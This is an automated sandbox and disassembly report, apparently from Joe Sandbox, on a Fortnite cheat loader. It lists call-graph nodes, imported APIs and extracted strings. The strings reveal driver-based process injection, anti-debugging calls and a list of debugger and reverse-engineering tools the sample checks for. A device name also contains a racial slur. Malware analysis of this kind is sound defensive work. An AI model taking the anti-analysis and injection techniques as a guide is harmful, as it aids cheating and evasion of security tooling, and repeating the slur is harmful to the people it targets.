7ff68b4caa18 SleepConditionVariableSRW 21842->21845 21845->21842 21847 7ff68b4c91ed 21846->21847 21848 7ff68b4c91e8 21846->21848 21847->20931 21848->21847 21849 7ff68b4c91f1 memchr 21848->21849 21849->21847 21850 7ff68b4c9215 21849->21850 21851 7ff68b4c9220 memcmp 21850->21851 21851->21847 21852 7ff68b4c9232 memchr 21851->21852 21852->21847 21852->21851 21855 7ff68b48caed 21854->21855 21856 7ff68b493400 3 API calls 21855->21856 21857 7ff68b48cb25 21856->21857 22124 7ff68b49c050 21857->22124 22125 7ff68b49c09f 22124->22125 22126 7ff68b49c072 22124->22126 22127 7ff68b493280 3 API calls 22126->22127 22127->22125 22848 7ff68b491602 22847->22848 22852 7ff68b4917ff 22847->22852 22849 7ff68b48cc60 3 API calls 22848->22849 22850 7ff68b4916fd 22849->22850 22853 7ff68b4917f5 22850->22853 22854 7ff68b4ad850 45 API calls 22850->22854 22851 7ff68b48c6f0 41 API calls 22851->22852 22852->21254 22853->22851 22854->22850 22856 7ff68b491f1f 22855->22856 22857 7ff68b491f05 free 22855->22857 22856->21260 22857->22856 22859 7ff68b48d822 22858->22859 22860 7ff68b48d829 22858->22860 22877 7ff68b48d5c0 22859->22877 22888 7ff68b48d6c0 22860->22888 22863 7ff68b48d827 22864 7ff68b4a4140 28 API calls 22863->22864 22865 7ff68b48d83b 22864->22865 22866 7ff68b48c6f0 41 API calls 22865->22866 22867 7ff68b48d840 22866->22867 22867->21259 22869 7ff68b48c7c0 2 API calls 22868->22869 22870 7ff68b4852b9 22869->22870 22870->21264 22872 7ff68b48da57 22871->22872 22874 7ff68b48db66 22871->22874 22873 7ff68b48c7c0 2 API calls 22872->22873 22872->22874 22875 7ff68b48db2d 22873->22875 22874->21253 22875->22874 22876 7ff68b493820 3 API calls 22875->22876 22876->22874 22878 7ff68b48d5e8 22877->22878 22879 7ff68b48d67a 22877->22879 22880 7ff68b48d6c0 9 API calls 22878->22880 22881 7ff68b482470 __stdio_common_vsprintf 22879->22881 22882 7ff68b48d668 22880->22882 22883 7ff68b48d697 22881->22883 22884 7ff68b4ca930 8 API calls 22882->22884 22886 7ff68b4ca930 8 API calls 22883->22886 22885 7ff68b48d675 22884->22885 22885->22863 22887 7ff68b48d6b6 22886->22887 22887->22863 22889 7ff68b482470 __stdio_common_vsprintf 22888->22889 22893 7ff68b48d700 22889->22893 22890 7ff68b48d7be 22891 7ff68b4ca930 8 API calls 22890->22891 22892 7ff68b48d7dd 22891->22892 22892->22863 22893->22890 22894 7ff68b482470 __stdio_common_vsprintf 22893->22894 22894->22890 22896 7ff68b4933de 22895->22896 22897 7ff68b49332a 22895->22897 22896->21266 22898 7ff68b4933cc 22897->22898 22899 7ff68b493365 malloc 22897->22899 22898->21266 22900 7ff68b4933ae 22899->22900 22901 7ff68b49337e memcpy 22899->22901 22900->21266 22902 7ff68b493396 22901->22902 22903 7ff68b4933a8 free 22901->22903 22902->22903 22903->22900 22905 7ff68b486f00 22904->22905 22906 7ff68b486ea9 22904->22906 22907 7ff68b486f50 22905->22907 22909 7ff68b486e80 3 API calls 22905->22909 22906->22905 22908 7ff68b493280 3 API calls 22906->22908 22907->21278 22908->22905 22909->22905 22911 7ff68b4a2522 22910->22911 22912 7ff68b4a210a 22910->22912 22911->21284 22914 7ff68b49c050 3 API calls 22912->22914 22931 7ff68b4a24c6 22912->22931 22913 7ff68b4ca930 8 API calls 22913->22911 22915 7ff68b4a2272 22914->22915 22916 7ff68b4a22d1 22915->22916 22917 7ff68b49c050 3 API calls 22915->22917 22918 7ff68b49c350 6 API calls 22916->22918 22917->22916 22919 7ff68b4a22f7 22918->22919 22920 7ff68b4a237e 22919->22920 22921 7ff68b49c050 3 API calls 22919->22921 22922 7ff68b49c350 6 API calls 22920->22922 22921->22920 22923 7ff68b4a23a4 22922->22923 22924 7ff68b4a2413 22923->22924 22925 7ff68b49c050 3 API calls 22923->22925 22926 7ff68b49c350 6 API calls 22924->22926 22925->22924 22927 7ff68b4a2439 22926->22927 22928 7ff68b4a24a0 22927->22928 22929 7ff68b49c050 3 API calls 22927->22929 22930 7ff68b49c350 6 API calls 22928->22930 22929->22928 22930->22931 22931->22913 22997 7ff68b49eb20 22932->22997 22935 7ff68b49e9f1 22937 7ff68b49ea0c free 22935->22937 22946 7ff68b49ea12 22935->22946 22936 7ff68b49e9eb free 22936->22935 22937->22946 22938 7ff68b49ea6a 22939 7ff68b49ea93 22938->22939 22941 7ff68b49ea89 free 22938->22941 22940 7ff68b49eab8 22939->22940 22942 7ff68b49eaae free 22939->22942 22944 7ff68b49ead3 free 22940->22944 22948 7ff68b49eada 22940->22948 22941->22939 22942->22940 22944->22948 22945 7ff68b48683b free 22945->21298 22946->22938 22947 7ff68b49ea56 free 22946->22947 23005 7ff68b4a1040 22946->23005 22947->22946 22948->22945 22949 7ff68b49eaf4 free 22948->22949 22949->22945 22951 7ff68b4925f4 22950->22951 22958 7ff68b4926e5 22950->22958 22952 7ff68b493600 3 API calls 22951->22952 22953 7ff68b49262a 22951->22953 22952->22953 22954 7ff68b493600 3 API calls 22953->22954 22956 7ff68b49263e 22953->22956 22954->22956 22955 7ff68b482650 11 API calls 22957 7ff68b4926c0 22955->22957 22956->22955 22957->22958 22959 7ff68b4926c8 fwrite fclose 22957->22959 22958->21297 22959->22958 22961 7ff68b493a99 22960->22961 22962 7ff68b493959 22960->22962 22961->21297 22964 7ff68b49398b free 22962->22964 22966 7ff68b493991 22962->22966 22963 7ff68b4939e4 23014 7ff68b4812a0 22963->23014 22964->22966 22966->22963 22968 7ff68b4939cf free 22966->22968 22968->22966 22969 7ff68b493a0b free 22972 7ff68b493a12 22969->22972 22970 7ff68b493a37 22973 7ff68b493a5c 22970->22973 22974 7ff68b493a55 free 22970->22974 22971 7ff68b493a30 free 22971->22970 22972->22970 22972->22971 23031 7ff68b4847c0 22973->23031 22974->22973 22979 7ff68b49ba3b 22978->22979 22980 7ff68b49ba1c free 22978->22980 22982 7ff68b49ba64 22979->22982 22983 7ff68b49ba5a free 22979->22983 22980->22979 22984 7ff68b49ba8d 22982->22984 22985 7ff68b49ba83 free 22982->22985 22983->22982 22986 7ff68b49bac2 22984->22986 22987 7ff68b49bab8 free 22984->22987 22985->22984 22988 7ff68b49bae1 free 22986->22988 22990 7ff68b49baeb 22986->22990 22987->22986 22988->22990 22989 7ff68b49bb10 free 22994 7ff68b49bb1d 22989->22994 22990->22989 22990->22994 22991 7ff68b49bbe3 22992 7ff68b486b63 22991->22992 22993 7ff68b49bc1c free 22991->22993 22992->21331 22992->21333 22993->22992 22994->22991 22995 7ff68b49bb94 free 22994->22995 22996 7ff68b49bbc7 free 22994->22996 22995->22994 22996->22994 22999 7ff68b49eb92 22997->22999 23003 7ff68b49eb40 22997->23003 22998 7ff68b49ec23 23001 7ff68b49e9d0 22998->23001 23002 7ff68b49ec42 free 22998->23002 22999->22998 23000 7ff68b49ec19 free 22999->23000 23000->22998 23001->22935 23001->22936 23002->23001 23003->22999 23004 7ff68b49eb76 free 23003->23004 23004->23003 23006 7ff68b4a10c0 3 API calls 23005->23006 23007 7ff68b4a104e 23006->23007 23008 7ff68b4a1071 23007->23008 23009 7ff68b4a106a free 23007->23009 23010 7ff68b4a108c free 23008->23010 23012 7ff68b4a1093 23008->23012 23009->23008 23010->23012 23011 7ff68b4a10b5 23011->22946 23012->23011 23013 7ff68b4a10ae free 23012->23013 23013->23011 23015 7ff68b49ba00 9 API calls 23014->23015 23016 7ff68b4812ae 23015->23016 23017 7ff68b4812d4 23016->23017 23019 7ff68b4812cd free 23016->23019 23018 7ff68b4812f9 23017->23018 23020 7ff68b4812f2 free 23017->23020 23021 7ff68b48131b 23018->23021 23022 7ff68b481314 free 23018->23022 23019->23017 23020->23018 23023 7ff68b48133d 23021->23023 23024 7ff68b481336 free 23021->23024 23022->23021 23025 7ff68b48135f 23023->23025 23026 7ff68b481358 free 23023->23026 23024->23023 23027 7ff68b48137a free 23025->23027 23030 7ff68b481381 23025->23030 23026->23025 23027->23030 23028 7ff68b4813a3 23028->22969 23028->22972 23029 7ff68b48139c free 23029->23028 23030->23028 23030->23029 23032 7ff68b4847d5 free 23031->23032 23035 7ff68b4847ee 23031->23035 23032->23035 23034 7ff68b48480c free 23037 7ff68b484813 23034->23037 23035->23034 23035->23037 23036 7ff68b484838 23039 7ff68b48485d 23036->23039 23040 7ff68b484856 free 23036->23040 23037->23036 23038 7ff68b484831 free 23037->23038 23038->23036 23041 7ff68b484882 free 23039->23041 23042 7ff68b48487b free 23039->23042 23040->23039 23041->22961 23042->23041 23044 7ff68b481d6b 23043->23044 23045 7ff68b481d52 free 23043->23045 23047 7ff68b481d86 free 23044->23047 23050 7ff68b481d8d 23044->23050 23045->23044 23047->23050 23048 7ff68b481daf 23048->21371 23048->21372 23049 7ff68b481da8 free 23049->23048 23050->23048 23050->23049 23052 7ff68b49374a 23051->23052 23053 7ff68b49379b 23051->23053 23052->23053 23058 7ff68b493788 free 23052->23058 23054 7ff68b4937c7 free 23053->23054 23055 7ff68b4937d1 23053->23055 23054->23055 23056 7ff68b4937fa 23055->23056 23057 7ff68b4937f1 free 23055->23057 23056->21377 23056->21378 23057->23056 23058->23052 23060 7ff68b4caf1a RtlLookupFunctionEntry 23059->23060 23061 7ff68b4caf30 RtlVirtualUnwind 23060->23061 23062 7ff68b4cae57 23060->23062 23061->23060 23061->23062 23063 7ff68b4cadf8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23062->23063 23064 7ff68b4ca2a0 23065 7ff68b4ca320 23064->23065 23065->23065 23066 7ff68b4ca330 system 23065->23066 23067 7ff68b4ca385 23066->23067 23067->23067 23094 7ff68b4cb9c0 ___lc_codepage_func 23067->23094 23074 7ff68b4ca403 23075 7ff68b4ca540 system 23074->23075 23079 7ff68b4ca4aa ShellExecuteW 23074->23079 23081 7ff68b4ca610 23075->23081 23076 7ff68b4ca3fe 23078 7ff68b4cad80 free 23076->23078 23077 7ff68b4ca3f7 _invalid_parameter_noinfo_noreturn 23077->23076 23078->23074 23079->23075 23081->23081 23082 7ff68b4cb9c0 __std_fs_code_page 2 API calls 23081->23082 23083 7ff68b4ca623 23082->23083 23084 7ff68b4b6b50 25 API calls 23083->23084 23085 7ff68b4ca63e 23084->23085 23086 7ff68b4b7630 31 API calls 23085->23086 23087 7ff68b4ca648 23086->23087 23088 7ff68b4ca689 23087->23088 23090 7ff68b4ca682 _invalid_parameter_noinfo_noreturn 23087->23090 23092 7ff68b4ca68e 23087->23092 23091 7ff68b4cad80 free 23088->23091 23089 7ff68b4ca7af Sleep 23090->23088 23091->23092 23092->23089 23093 7ff68b4ca719 ShellExecuteW 23092->23093 23093->23089 23095 7ff68b4cb9d3 AreFileApisANSI 23094->23095 23096 7ff68b4ca398 23094->23096 23095->23096 23097 7ff68b4b6b50 23096->23097 23098 7ff68b4b6c81 23097->23098 23099 7ff68b4b6ba7 23097->23099 23112 7ff68b4b7630 23098->23112 23111 7ff68b4b6ca7 23099->23111 23119 7ff68b4cb9e8 MultiByteToWideChar 23099->23119 23102 7ff68b4b6cad 23103 7ff68b4b1a70 12 API calls 23102->23103 23104 7ff68b4b6cb9 23103->23104 23107 7ff68b4b6be5 23108 7ff68b4cb9e8 __std_fs_convert_narrow_to_wide 2 API calls 23107->23108 23109 7ff68b4b6c76 23108->23109 23109->23098 23142 7ff68b4b1a70 23109->23142 23146 7ff68b4b1790 23111->23146 23113 7ff68b4b764f 23112->23113 23160 7ff68b4cbafc 23113->23160 23116 7ff68b4b7721 23117 7ff68b4ca930 8 API calls 23118 7ff68b4b7714 23117->23118 23118->23074 23118->23076 23118->23077 23120 7ff68b4cba12 GetLastError 23119->23120 23121 7ff68b4b6bca 23119->23121 23120->23121 23121->23102 23121->23107 23122 7ff68b4c93d0 23121->23122 23123 7ff68b4c9576 23122->23123 23126 7ff68b4c93ff 23122->23126 23150 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 23123->23150 23125 7ff68b4c957b 23130 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 23125->23130 23126->23125 23127 7ff68b4c9481 23126->23127 23128 7ff68b4c94ad 23126->23128 23134 7ff68b4c9465 23126->23134 23127->23125 23131 7ff68b4c948e 23127->23131 23129 7ff68b4caf74 std::_Facet_Register 4 API calls 23128->23129 23129->23134 23132 7ff68b4c9581 23130->23132 23133 7ff68b4caf74 std::_Facet_Register 4 API calls 23131->23133 23133->23134 23135 7ff68b4c952d memcpy 23134->23135 23136 7ff68b4c94cd memcpy 23134->23136 23138 7ff68b4c9526 _invalid_parameter_noinfo_noreturn 23134->23138 23137 7ff68b4c9524 23135->23137 23139 7ff68b4c94e0 23136->23139 23137->23107 23138->23135 23139->23138 23140 7ff68b4c9519 23139->23140 23141 7ff68b4cad80 free 23140->23141 23141->23137 23143 7ff68b4b1a80 23142->23143 23151 7ff68b4b16a0 23143->23151 23147 7ff68b4b179e 23146->23147 23148 7ff68b4b16a0 11 API calls 23147->23148 23149 7ff68b4b17b5 _CxxThrowException __std_exception_copy 23148->23149 23149->23102 23150->23125 23152 7ff68b4b16d6 __std_exception_copy 23151->23152 23153 7ff68b4b175a 23152->23153 23156 7ff68b4b1725 23152->23156 23154 7ff68b4ca930 8 API calls 23153->23154 23157 7ff68b4b177b _CxxThrowException 23154->23157 23155 7ff68b4b1755 23159 7ff68b4cad80 free 23155->23159 23156->23155 23158 7ff68b4b174e _invalid_parameter_noinfo_noreturn 23156->23158 23158->23155 23159->23153 23163 7ff68b4cbb3e 23160->23163 23161 7ff68b4cbb47 23162 7ff68b4ca930 8 API calls 23161->23162 23165 7ff68b4b7668 23162->23165 23163->23161 23164 7ff68b4cbc59 23163->23164 23167 7ff68b4cbb9f GetFileAttributesExW 23163->23167 23198 7ff68b4cbe24 CreateFileW 23164->23198 23165->23116 23165->23117 23169 7ff68b4cbbb3 GetLastError 23167->23169 23170 7ff68b4cbc04 23167->23170 23169->23161 23173 7ff68b4cbbc2 FindFirstFileW 23169->23173 23170->23161 23170->23164 23171 7ff68b4cbca2 23176 7ff68b4cbd53 23171->23176 23177 7ff68b4cbcb1 GetFileInformationByHandleEx 23171->23177 23172 7ff68b4cbc82 23174 7ff68b4cbc9b 23172->23174 23175 7ff68b4cbc8d CloseHandle 23172->23175 23178 7ff68b4cbbe1 FindClose 23173->23178 23179 7ff68b4cbbd6 GetLastError 23173->23179 23174->23161 23175->23174 23180 7ff68b4cbe14 abort 23175->23180 23181 7ff68b4cbd6e GetFileInformationByHandleEx 23176->23181 23182 7ff68b4cbdae 23176->23182 23183 7ff68b4cbcf4 23177->23183 23184 7ff68b4cbccb GetLastError 23177->23184 23178->23170 23179->23161 23180->23174 23181->23182 23185 7ff68b4cbd84 GetLastError 23181->23185 23187 7ff68b4cbdc5 23182->23187 23188 7ff68b4cbe01 23182->23188 23183->23176 23190 7ff68b4cbd15 GetFileInformationByHandleEx 23183->23190 23184->23174 23186 7ff68b4cbcd9 CloseHandle 23184->23186 23185->23174 23192 7ff68b4cbd96 CloseHandle 23185->23192 23186->23174 23193 7ff68b4cbce6 abort 23186->23193 23187->23161 23189 7ff68b4cbdcb CloseHandle 23187->23189 23188->23174 23191 7ff68b4cbe07 CloseHandle 23188->23191 23189->23161 23189->23180 23190->23176 23194 7ff68b4cbd31 GetLastError 23190->23194 23191->23174 23191->23180 23192->23174 23195 7ff68b4cbda7 abort 23192->23195 23193->23174 23194->23174 23196 7ff68b4cbd3f CloseHandle 23194->23196 23195->23182 23196->23174 23197 7ff68b4cbd4c abort 23196->23197 23197->23176 23199 7ff68b4cbc7c 23198->23199 23200 7ff68b4cbe66 GetLastError 23198->23200 23199->23171 23199->23172 23200->23199 23201 7ff68b481000 GetSystemMetrics
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$system$Window$Create$Cpp_error@std@@LoadThrow_$HandlePerformanceQueryThreadV01@_$AddressCloseCounterCurrentDebuggerFileIconMessagePresentProcProcess32ProtectThrd_detachVirtual_beginthreadexexit$??5?$basic_istream@AreaAttributesCheckClassClientControlCursorDesktopDeviceExtendFirstFrameFrequencyInformationIntoLayeredLibraryLongModuleNextProcessRandom_device@std@@RectRegisterRemoteShowSleepSnapshotToolhelp32Update_invalid_parameter_noinfo_noreturnlstrcmpi
                                                                                                                                                                                                      • String ID: Driver Found$ Inject Orqur$ Load Dependencies (Close Game First)$ Waiting For Fortnite$ Your choice: $Base Address -> $Driver Error Contact Support.$Fortnite$FortniteClient-Win64-Shipping.exe$The driver could not get the base address...$VAText -> $WinVer$\\.\orqur-ontop-fucking-nigger$cls$cr3 ->
                                                                                                                                                                                                      • API String ID: 199387910-4207893356
                                                                                                                                                                                                      • Opcode ID: 6afdbcf87a3b67085b1b6566a440aee1ec517a3b6d9f6c1b7e69540980585ce6
                                                                                                                                                                                                      • Instruction ID: 148c47e62b66924d2e1d406669d473214f6734edac88b376481504cb83c49511
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6afdbcf87a3b67085b1b6566a440aee1ec517a3b6d9f6c1b7e69540980585ce6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F413F826D25BC289F7139B3594132E4A350AFAB7C4F40D336E95476A6BEF39B285C304
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
                                                                                                                                                                                                      • String ID: 0000000000000000$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
                                                                                                                                                                                                      • API String ID: 3073719868-2087985706
                                                                                                                                                                                                      • Opcode ID: de9bff0a8e818de36f9d9748c275109a1bba248353a6a13a8705fb6a0d04ead7
                                                                                                                                                                                                      • Instruction ID: e2a368b86e11e5dcbcd09f88930f4c19cb422c85537b4af4b982445486708b66
                                                                                                                                                                                                      • Opcode Fuzzy Hash: de9bff0a8e818de36f9d9748c275109a1bba248353a6a13a8705fb6a0d04ead7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EF2F926D29B9386F703973598130A8E354BFAB680B50D33BFE5477A65FF29B1858304

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
                                                                                                                                                                                                      • String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
                                                                                                                                                                                                      • API String ID: 995830000-2640589995
                                                                                                                                                                                                      • Opcode ID: adf374b0e8421fad87755e922a66f96c4bdbfe7214f3300a5803e6311160309a
                                                                                                                                                                                                      • Instruction ID: 5a38b1dcd4a424e7fa1b5db330ea995c71ff0630ce6c8216b886dc38b11f822b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: adf374b0e8421fad87755e922a66f96c4bdbfe7214f3300a5803e6311160309a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7B1F326D29B8286F7039735A813165E360BFAB780F50D336FA5473A66EF2DF1858704

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975
                                                                                                                                                                                                      • FindWindowA.USER32 ref: 00007FF68B4B44BF
                                                                                                                                                                                                      • FindWindowA.USER32 ref: 00007FF68B4B45F5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
                                                                                                                                                                                                      • API String ID: 3370411492-2758119655
                                                                                                                                                                                                      • Opcode ID: 1d9e69b401927d88b9fca741bb07f01ba78ba68ae319a56e903c9ea4fa3ef6b6
                                                                                                                                                                                                      • Instruction ID: a5b516697937221029798aa28c9f1bc0700846aa0c67cf3478619681df783211
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d9e69b401927d88b9fca741bb07f01ba78ba68ae319a56e903c9ea4fa3ef6b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA917322E54BC585E710CB75D8422F96361FF9E784F50673AEA8D93A69DF78E284C300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExecuteShell__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
                                                                                                                                                                                                      • String ID: h\ph$me.e$ysme
                                                                                                                                                                                                      • API String ID: 2996404153-506599315
                                                                                                                                                                                                      • Opcode ID: 402041abf3d57c2e9f9853a71c2590334672f65a2095b9b116e3a0899d59e04f
                                                                                                                                                                                                      • Instruction ID: 51f9c8300dce8191f2385855e5f3eed4b5c1840fb5d5e5999aa5df05f879efa0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 402041abf3d57c2e9f9853a71c2590334672f65a2095b9b116e3a0899d59e04f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0E1AE72E28781CAF301CFB4E0422AD7771FF59748F505229EE896BAA9DF789149C740

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
